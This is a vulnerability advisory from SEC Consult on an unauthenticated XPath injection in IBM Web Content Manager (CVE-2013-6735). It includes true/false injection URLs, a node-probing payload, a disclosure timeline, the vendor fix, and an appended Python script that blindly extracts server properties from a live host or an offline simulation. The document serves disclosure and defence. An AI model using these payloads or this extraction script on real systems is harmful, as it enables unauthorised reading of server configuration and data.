SEC Consult Vulnerability Lab Security Advisory
=======================================================================
              title: XPath Injection
            product: IBM Web Content Manager (WCM)
 vulnerable version: 6.x, 7.x, 8.x
      fixed version: -
             impact: high
           homepage: http://www.ibm.com/
              found: 2013-10-27
                CVE: CVE-2013-6735
                 by: A.Antukh, S.Temnikov
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
"IBM® Web Content Manager is designed to accelerate web content development and deployment through Internet, intranet and extranet sites. This software enables users to create and publish content while IT retains control. Through advanced personalization, IBM Web Content Manager delivers the right information to the right audience when needed, providing an exceptional customer experience"
The discovered vulnerability can be exploited without authentication and therefore poses a high security risk: it allows extraction of configuration data from the server. The full impact of the XPath injection has not been researched. SEC Consult suspects that it is possible to extract sensitive information that would be useful for further attacks. SEC Consult recommends installing the patches provided by the vendor immediately.
A typical URL for a host with installed WCM looks like this: http://[HOST]:[PORT]/wps/wcm/connect/[PATH]
The "connect" servlet provided in the standard installation of IBM Web Content Manager parses the PATH element as follows: [PATH] = [LIBRARY]/[SITE_AREA_PATH]/[CONTENT]
Due to insufficient validation, the "LIBRARY" element suffers from an XPath injection vulnerability: the "connect" servlet does not properly validate the LIBRARY parameter before using it in an XPath query.
An unauthenticated user is therefore able to perform blind XPath injection attacks, e.g. to read the current application configuration, enumerate nodes and extract other valuable information from vulnerable installations of Web Content Manager.
The most basic cases are presented below; they allow an attacker to manipulate the logic of the request. The "false" clause causes an error, while the "true" clause (when no content is addressed explicitly) redirects the attacker to the "/wcm/webinterface/login/login.jsp" page.

True clause:
http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='a

False clause:
http://[HOST]:[PORT]/wps/wcm/connect/' or 'a'='b
Knowing the difference between the responses to the true and false clauses, it is possible to craft requests that extract information one boolean answer at a time. For example, if the following request returns TRUE, the attacker learns that a node whose "name" property equals "pznDT" exists:
http://[HOST]:[PORT]/wps/wcm/connect/' or (@ibmcontentwcm:name = "pznDT") or 'a'='b
In the same way, the "jcr:like" and "jcr:contains" functions can be used to recover the value of the "target" property.
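The boolean oracle described above (TRUE clause redirects to login.jsp, FALSE clause errors out) is enough to recover a property value blindly. The following script is an added example written for this page, not code from SEC Consult or IBM. It reuses only what the advisory states: the "connect" path, the injection frame ' or (...) or 'a'='b, the login page used as the TRUE signal and the @ibmcontentwcm:name property. Everything else is an assumption: that the backend accepts the plain XPath 1.0 functions string-length() and substring() (the advisory itself only demonstrates equality, jcr:like and jcr:contains), that the host URL has the form http://[HOST]:[PORT]/wps/wcm/connect/, and the response classification in http_oracle(). The simulated_oracle() and its sample node are constructed so the extraction loop runs offline.

```python
import re
import string
import urllib.parse
import urllib.request
from urllib.error import HTTPError

# Strings taken from the advisory: the login page a TRUE clause redirects to
# and the property it probes. Everything else in this file is an assumption.
LOGIN_PAGE = "/wcm/webinterface/login/login.jsp"
NAME_PROP = "@ibmcontentwcm:name"
CHARSET = string.ascii_letters + string.digits + "_-. "


def build_url(base, predicate):
    """Place the advisory's injection frame  ' or (<predicate>) or 'a'='b
    in the LIBRARY position of the connect path. `base` is assumed to look
    like http://[HOST]:[PORT]/wps/wcm/connect/ ; the payload is percent-encoded."""
    injected = f"' or ({predicate}) or 'a'='b"
    return base.rstrip("/") + "/" + urllib.parse.quote(injected, safe="")


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_oracle(base, timeout=10):
    """Return oracle(predicate) -> bool for a live host (hypothetical target).
    Per the advisory a TRUE clause redirects to login.jsp; any other answer
    (the error page) is treated as FALSE. Use only with authorisation."""
    opener = urllib.request.build_opener(_NoRedirect)

    def oracle(predicate):
        try:
            opener.open(build_url(base, predicate), timeout=timeout)
        except HTTPError as err:
            location = err.headers.get("Location") or ""
            return err.code in (301, 302, 303, 307) and LOGIN_PAGE in location
        return False  # 200 OK without a redirect is not the TRUE branch

    return oracle


def extract_string(oracle, prop=NAME_PROP, charset=CHARSET, max_len=64):
    """Blind extraction with XPath 1.0 string functions: binary-search the
    length with string-length(), then test each position with substring().
    A character outside `charset` is reported as '?'."""
    lo, hi = 0, max_len
    while lo < hi:  # invariant: lo <= length <= hi
        mid = (lo + hi) // 2
        if oracle(f"string-length({prop}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    recovered = []
    for pos in range(1, length + 1):  # XPath positions are 1-based
        for ch in charset:
            if oracle(f'substring({prop}, {pos}, 1) = "{ch}"'):
                recovered.append(ch)
                break
        else:
            recovered.append("?")
    return "".join(recovered)


def simulated_oracle(node):
    """Constructed stand-in for the vulnerable servlet so the loop can be run
    offline. It understands only the two predicate shapes extract_string()
    emits and evaluates them against `node`, a dict of property -> value
    (sample data, not taken from any real installation)."""
    def oracle(predicate):
        m = re.fullmatch(r"string-length\((@[\w:]+)\) > (\d+)", predicate)
        if m:
            return len(node.get(m.group(1), "")) > int(m.group(2))
        m = re.fullmatch(r'substring\((@[\w:]+), (\d+), 1\) = "(.)"', predicate)
        if m:
            value, pos = node.get(m.group(1), ""), int(m.group(2))
            return pos <= len(value) and value[pos - 1] == m.group(3)
        raise ValueError(f"unsupported predicate: {predicate}")
    return oracle


if __name__ == "__main__":
    # Offline demonstration; for a live host swap in
    # http_oracle("http://host:port/wps/wcm/connect/") (hypothetical URL).
    probe = simulated_oracle({NAME_PROP: "pznDT"})
    print(extract_string(probe))  # pznDT
```

The per-position loop costs one request per candidate character; the jcr:like function the advisory mentions can cut that down by testing prefixes with wildcards, but the plain substring() probe is the easiest to verify against the true/false responses described above.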
The vulnerability is verified to exist in the 7.0 and 8.0 versions of WCM which are the most recent versions at the moment of writing the advisory.
2013-12-04: Contacted vendor through email@example.com.
2013-12-04: Initial vendor response.
2013-12-06: Issues will be verified.
2013-12-20: Security bulletin released.
2013-12-27: SEC Consult releases coordinated security advisory.
Apply the Interim Fix PI07777:
www.ibm.com/eserver/support/fixes/fixcentral/swg/quickorder?productid=WebSphere%20Portal&brandid=5&apar=PI07777
No workaround available.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab
SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15
Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF A. Antukh / @2013